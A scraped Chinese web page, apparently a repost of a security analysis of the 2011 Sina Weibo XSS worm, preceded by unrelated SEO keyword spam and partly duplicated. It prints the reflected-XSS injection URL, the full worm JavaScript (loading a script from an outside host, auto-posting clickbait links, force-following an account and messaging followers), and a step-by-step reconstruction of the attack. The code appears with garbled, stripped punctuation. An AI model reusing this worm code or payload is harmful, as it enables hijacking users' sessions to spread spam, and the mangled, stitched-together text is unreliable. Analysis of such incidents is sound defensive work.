长沙互联网企业排名,优化设计七年级上册语文答案,深圳龙华区怎么样,域名被锁定网站打不开主要是因为新浪的广场页面有几个链接对输入参数过滤不严导致的反射性XSS。 微博XSS漏洞点 weibo.com/pub/star/g/xyyyd%22%3e%3cscript%20src//www.****.com/images/t.js%3e%3c/script%3e?typeupdate 微博XSS脚本内容(XSS源码)function createXHR(){ return window.XMLHttpRe… 主要是因为新浪的广场页面有几个链接对输入参数过滤不严导致的反射性XSS。 微博XSS漏洞点 weibo.com/pub/star/g/xyyyd%22%3e%3cscript%20src//www.****.com/images/t.js%3e%3c/script%3e?typeupdate 微博XSS脚本内容(XSS源码)function createXHR(){ return window.XMLHttpRequest? new XMLHttpRequest(): new ActiveXObject(Microsoft.XMLHTTP); } function getappkey(url){ xmlHttp createXHR(); xmlHttp.open(GET,url,false); xmlHttp.send(); result xmlHttp.responseText; id_arr ; id result.match(/namecard\true\ title\[^\]*/g); for(i0;iid.length;i){ sum id.toString().split()[3]; id_arr sum ||; } return id_arr; } function random_msg(){ link http://163.fm/PxZHoxn?id new Date().getTime();; var msgs [ 郭美美事件的一些未注意到的细节, 建党大业中穿帮的地方, 让女人心动的100句诗歌, 3D肉团团高清普通话版种子, 这是传说中的神仙眷侣啊, 惊爆!范冰冰艳照真流出了, 杨幂被爆多次被潜规则:, 傻仔拿锤子去抢银行, 可以监听别人手机的软件, 个税起征点有望提到4000]; var msg msgs[Math.floor(Math.random()*msgs.length)] link; msg encodeURIComponent(msg); return msg; } function post(url,data,sync){ xmlHttp createXHR(); xmlHttp.open(POST,url,sync); xmlHttp.setRequestHeader(Accept,text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8); xmlHttp.setRequestHeader(Content-Type,application/x-www-form-urlencoded; charsetUTF-8); xmlHttp.send(data); } function publish(){ url http://weibo.com/mblog/publish.php?rnd new Date().getTime(); 发送微博 data content random_msg() picstyleid2retcode; post(url,data,true); } function follow(){ url http://weibo.com/attention/aj_addfollow.php?refer_sortprofileatnIdprofilernd new Date().getTime(); data uid 2201270010 fromuid $CONFIG.$uid refer_sortprofileatnIdprofile; post(url,data,true); 加关注 } function message(){ url http://weibo.com/ $CONFIG.$uid /follow; 给粉丝发私信 ids getappkey(url); id ids.split(||); for(i0;iid.length - 1 i5;i){ msgurl http://weibo.com/message/addmsg.php?rnd new Date().getTime(); msg random_msg(); msg encodeURIComponent(msg); user encodeURIComponent(encodeURIComponent(id)); data content msg name user retcode; post(msgurl,data,false); } } function main(){ try{ publish(); } catch(e){} try{ follow(); } catch(e){} try{ message(); } catch(e){} } try{ xgdocument.createElement(script);g.srchttp://www.2kt.cn/images/t.js;document.body.appendChild(g);window.opener.eval(x); } catch(e){} main(); var tsetTimeout(locationhttp://weibo.com/pub/topic;,5000); Nevel安全专家:新浪微博”中毒”分析报告 事件的经过 新浪微博6月28日晚出现大范围”中毒”现象大量用户自动发送”建党大业中穿帮的地方”“个税起征点有望提到4000”“郭美美事件的一些未注意到的细节”等带链接的微博与私信并自动关注一位名为hellosamy的用户。 此前利用XSS漏洞传播蠕虫的案列在社交网站中曾多次发生Facebook,Twitter,以及QQ空间百度空间等都出现过类似的情况。此次新浪 微博”中毒”立刻引起了Nevel公司安全团队的重视。新浪官方早在第一时间就检测到该病毒并对漏洞进行了修补病毒的存活时间不到半个小时其实 XSS中毒现象也并不像传统意义上的中毒仅仅存活在服务器上它基本不会对用户电脑造成很大威胁但会利用用户在新浪微博上的会话权限进行微博发布、关 注等操作同时该漏洞也无法获取到用户的密码信息用户不需要有太多的担忧。 分析报告: 下面我们来一起分析下该漏洞的成因:从PAYLOAD上来看实际上属于一个反射弧性的XSS攻击 http://weibo.com/pub/star/g/xyyyd%22%3E%3Cscript%20src//www.2kt.cn/images/t.js%3E%3C/script%3E?typeupdate URlDecode http://weibo.com/pub/star/g/xyyyd ?typeupdate 攻击者利用微博广播广场页面http://weibo.com/pub/star的一个URL注入了js脚本那么这个脚本攻击者是怎么注入进去的(新 浪漏洞已修补)我们其实可以根据现象去分析对于蠕虫攻击受攻击者的页面应该也都会发布带有攻击性的JS内容我们可以发现所有被攻击的用户微博上都 会发布一条短连接信息因此我们可以初步断定问题发生在短连接处笔者利用自己的微博尝试发布一条带有短连接形式的微博直接发布一条含有URL的微 博如下图: 发布完成后我们查看下网页源代码如下图 很显然真实的地址会被写入到action-data的属性中去因此不难想象漏洞产生原因由于action-data的值没有进行合适的过滤导致攻击者可以输入畸形的数据插入JS脚本闭合前面的双引号和尖括号从而造成XSS攻击。 构造Xss_Exploit如下: http://weibo.com/pub/star/g/xyyyd ?typeupdate 注: //www.2kt.cn/images/t.js是一种合法的协议写法与http://www.2kt.cn/images/t.js效果一样。 完整模拟攻击者的攻击手段: 1 首先将攻击脚本存放在www.2kt.cn服务器上 2 建立恶意用户利用构造的XSS_Exploit发布微博消息 3 通过发布吸引力强的热门的话题让有影响力的人访问中招者自动发微博并进行传播 在攻击过程中攻击者多次利用短连接将真实的URL进行转换让一般用户不易发现以便更好地延长蠕虫的存活时间短连接在提供简短易记的同时也带来了一些新的安全问题攻击者可以利用这些短连接隐藏实际攻击URL来进行攻击.转载于:https://www.cnblogs.com/milantgh/p/3655023.html
